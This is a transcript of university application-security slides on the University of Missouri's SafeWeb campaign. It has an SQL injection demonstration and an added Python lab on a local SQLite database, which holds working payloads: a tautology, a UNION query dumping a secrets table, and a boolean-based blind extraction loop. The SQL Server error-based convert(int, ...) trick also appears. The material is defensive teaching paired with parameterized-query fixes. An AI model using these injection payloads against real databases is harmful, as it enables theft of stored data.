TRANSCRIPT
Application Security at MU
Allen Brokken (GSEC, CPTS), Principal Systems Security Analyst
Demonstration: SQL Injection / Blind SQL Injection
SQL Injection – Vulnerable Code
Vulnerable code (the value of the cboLocation form field is concatenated straight into the query text):
URL
sSql = sSql + " where LocationID = " + Request["cboLocation"] + "";
oCmd.CommandText = sSql;
SQL Injection – Vulnerable Code
Debug view of oCmd.CommandText after the attacker submits cboLocation=convert(int,(select top 1 name from sysobjects)):
"SELECT EventName, EndDate, [Description], [Location], ……. from Events where LocationID = convert(int,(select top 1 name from sysobjects))"
On SQL Server the convert(int, ...) of a table name fails, and if the application shows database errors to the user, the error text spells out the name that could not be converted. Repeating the trick with "top 1 name ... where name > 'Events'" walks the whole table list.
SQL Remediation
■ Do not build SQL statements with user-provided data in the command text
■ Parameterized queries
■ Minimum necessary rights on the application's database user
■ Disable detailed error messages (the error text is what turns the convert(int, ...) trick above into a data leak)
SQL Injection – Safe Code
Simple but safe code (a placeholder in the SQL, with the value supplied as a parameter):
URL
sSql = sSql + " where LocationID = @LocationID";
oCmd.CommandText = sSql;
oCmd.Parameters.Add("@LocationID", Request["cboLocation"]);
SQL Injection – Safe Code
Debug view of oCmd.CommandText: the user's value never appears in the SQL text, only the placeholder does, so nothing the user types can change the query's structure.
SELECT EventName,[Description], [Location] from Events where LocationID = @LocationID
Java Prepared Statement
http://java.sun.com/docs/books/tutorial/jdbc/basics/prepared.html
PreparedStatement updateSales = con.prepareStatement(
    "UPDATE COFFEES SET SALES = ? WHERE COF_NAME LIKE ? ");
updateSales.setInt(1, 75);
updateSales.setString(2, "Colombian");
updateSales.executeUpdate();
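As an added example (not code from the presentation), the demonstration above carried through end to end in Python against an in-memory SQLite database standing in for SQL Server. The Events table, its rows, the Secrets table and the payload strings are constructed for this example. SQLite does not raise a conversion error for the slide's convert(int, ...) trick, so the blind half uses a boolean-based technique instead: the attacker learns one bit per request (did the page return rows or not) and still recovers a table name character by character. The same payloads are then sent through the parameterized version to show why the remediation works.

```python
import sqlite3
import string

# Constructed sample schema and rows (not from the presentation): an Events
# table like the one in the slide plus a second table the attacker should
# never be able to read.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE Events (EventName TEXT, EndDate TEXT, Description TEXT,
                             Location TEXT, LocationID INTEGER);
        CREATE TABLE Secrets (Username TEXT, PasswordHash TEXT);
        INSERT INTO Events VALUES ('Orientation', '2007-08-20', 'Welcome week', 'Jesse Hall', 1);
        INSERT INTO Events VALUES ('Homecoming', '2007-10-13', 'Parade', 'Downtown', 2);
        INSERT INTO Secrets VALUES ('admin', '$2a$10$fakehashforillustration');
    """)
    return con


def events_vulnerable(con, cbo_location):
    """The slide's pattern: the request value is concatenated into the SQL text."""
    sql = "SELECT EventName, EndDate, Description, Location FROM Events"
    sql = sql + " where LocationID = " + cbo_location + ""
    return con.execute(sql).fetchall()


def events_safe(con, cbo_location):
    """The remediated pattern: a placeholder in the SQL, the value sent as a
    parameter. The database never parses the value as SQL, so operators and
    subqueries in it are just characters that match no LocationID."""
    sql = "SELECT EventName, EndDate, Description, Location FROM Events where LocationID = ?"
    return con.execute(sql, (cbo_location,)).fetchall()


# Payloads a tester would submit as the cboLocation field (constructed).
TAUTOLOGY = "2 OR 1=1"
UNION_DUMP = "2 UNION SELECT Username, PasswordHash, NULL, NULL FROM Secrets"


def blind_extract_first_table(query, max_len=32):
    """Boolean-based blind injection. `query` is a callable that takes the
    attacker-controlled string and returns the rows the page showed. The
    attacker only observes whether any rows came back, and recovers the
    first table name one character at a time by ANDing a true/false
    condition onto a LocationID that is known to exist."""
    alphabet = string.ascii_letters + string.digits + "_"
    name = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            condition = ("substr((SELECT name FROM sqlite_master WHERE type='table' "
                         f"ORDER BY name LIMIT 1), {pos}, 1) = '{ch}'")
            if query("1 AND " + condition):
                name += ch
                break
        else:
            return name          # no character matched: end of the name (or nothing leaks)
    return name


if __name__ == "__main__":
    con = make_db()
    print(events_vulnerable(con, TAUTOLOGY))     # every event, not just LocationID 2
    print(events_vulnerable(con, UNION_DUMP))    # Secrets rows appended to the result set
    print(blind_extract_first_table(lambda p: events_vulnerable(con, p)))
    print(events_safe(con, TAUTOLOGY))           # [] : the payload is compared as a literal
    print(blind_extract_first_table(lambda p: events_safe(con, p)))  # "" : nothing leaks
```

The blind loop is deliberately slow (one request per candidate character) to make the point that hiding error messages alone does not close the hole; it only removes the fastest extraction path. The parameterized version returns nothing for every payload because the whole string is compared against LocationID as a value, which is the property the slide's @LocationID parameter gives the .NET code. The "minimum rights" item on the remediation list cannot be shown with SQLite, which has no per-user grants; on SQL Server it means the application login gets no rights on sysobjects and on tables it does not need.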
University of Missouri - Columbia
■ Flagship campus in a four-campus public university system
■ 15,000+ employees
■ Outreach and Extension programs (state-wide)
■ Approximately 27,000 students: ~20,500 undergraduates, ~6,500 graduate/professional
■ Approximately 6,000 students live in University housing; most have high-speed internet access (ResNet)
University of Missouri - Columbia
Information Access & Technology Services (IATS) is the central IT group
■ Voice / Cable TV / Wired & Wireless Network
■ Central storage
■ Help desk
■ Computing Sites
■ Application Development
■ Account Management
■ Security
University of Missouri - Columbia
Application Development Environment
■ Central Application Development Group: .NET centric, organized around a standard process
■ Distributed Application Development: multiple development "shops", plus lone jack-of-all-trades developers
■ 3rd Party Applications
Traditional Security Concept
■ Security subject matter expert
■ Largely bolted on after the fact
■ Incredibly slow process
Traditional Security Concept
Issues with the traditional concept
■ The security professional becomes a bottleneck
■ The process builds adversarial relationships within the organization
■ The process has a high long-term cost in productivity and tends to actually reduce security
The New Security Concept
■ Whole campus focus
■ More staff
■ Developer education
■ Better tools
■ Campus policy
The New Security Concept
The SAFEWEB Campaign Objectives
■ Application development standards with an emphasis on security.
■ Data classification policies.
■ Secure server environments that support the defined data classifications.
■ Auditing policies and processes to ensure adherence to the standards.
■ Minimum training requirements for application development, database administration and server administration.
Administrative Effect
■ Buy-in from Provost staff and the Council of Deans
■ Campus developer education opportunities to gain support
■ IAT Services process changes
Administrative Effect
■ Vastly improved turnaround time
■ Better code, with fewer vulnerabilities
■ Better communication with campus developers
■ Standardized code for key functions
Research Effect
■ Research systems inspections: I3, "Departmental Back-Up Web Server"
■ Researcher awareness
■ Graduate student benefits
Classroom Effect
■ Faculty collaboration
■ Guest lecture series
■ Classroom software pilot
Classroom Effect
Guest Lecture Series
■ General Security Awareness
■ Digital Millennium Copyright Act
■ Web Application Security Basics
■ Payment Card Industry Data Security Standard
■ Information Security Auditing and Tools
Classroom Effect
"In the auditing environment today technology plays a very large part in what we will be doing. After this presentation I was given insight into various tools that companies I might be auditing could be implementing."
Anonymous Student – Information Assurance
"[the]…presentation really does help to validate our course content. Students seem to better appreciate the value of controls when someone who actually deals with them on a daily basis emphasizes their importance."
Dr. Elaine Mauldin – Professor, Information Assurance
Classroom Effect
Report Details
■ Severity
■ File Name(s)
■ Summary
■ Execution
■ Implication
■ Fix
■ References
Classroom Effect
Management Console Look at Student Learning
Classroom Effect
Student survey responses (the slide gives two responses for each statement):
■ I would use this tool outside of this class to ensure the security of my code if it were generally available: Mostly Agree / Mostly Agree
■ I would recommend the use of this tool to others if it were generally available: Mostly Agree / Mostly Agree
■ I learned something from the use of this software: Mostly Agree / Totally Agree
■ I appreciated the inclusion of security related topics in this course: Totally Agree / Totally Agree
■ I am more concerned about the security of my code now than I was before using the software: Totally Agree / Totally Agree
Classroom Effect
"… I truly believe that my students learned more about web security by using this software in the Web App II class. … I think Computer Science and SISLT should consider using this system in the future."
Chris Amelung – Course Instructor, Web Application Development II
Q&A
SafeWeb Initiative■ http://safeweb.missouri.edu
Application Security Software■ http://www.spidynamics.com
Presenter Contact■ [email protected]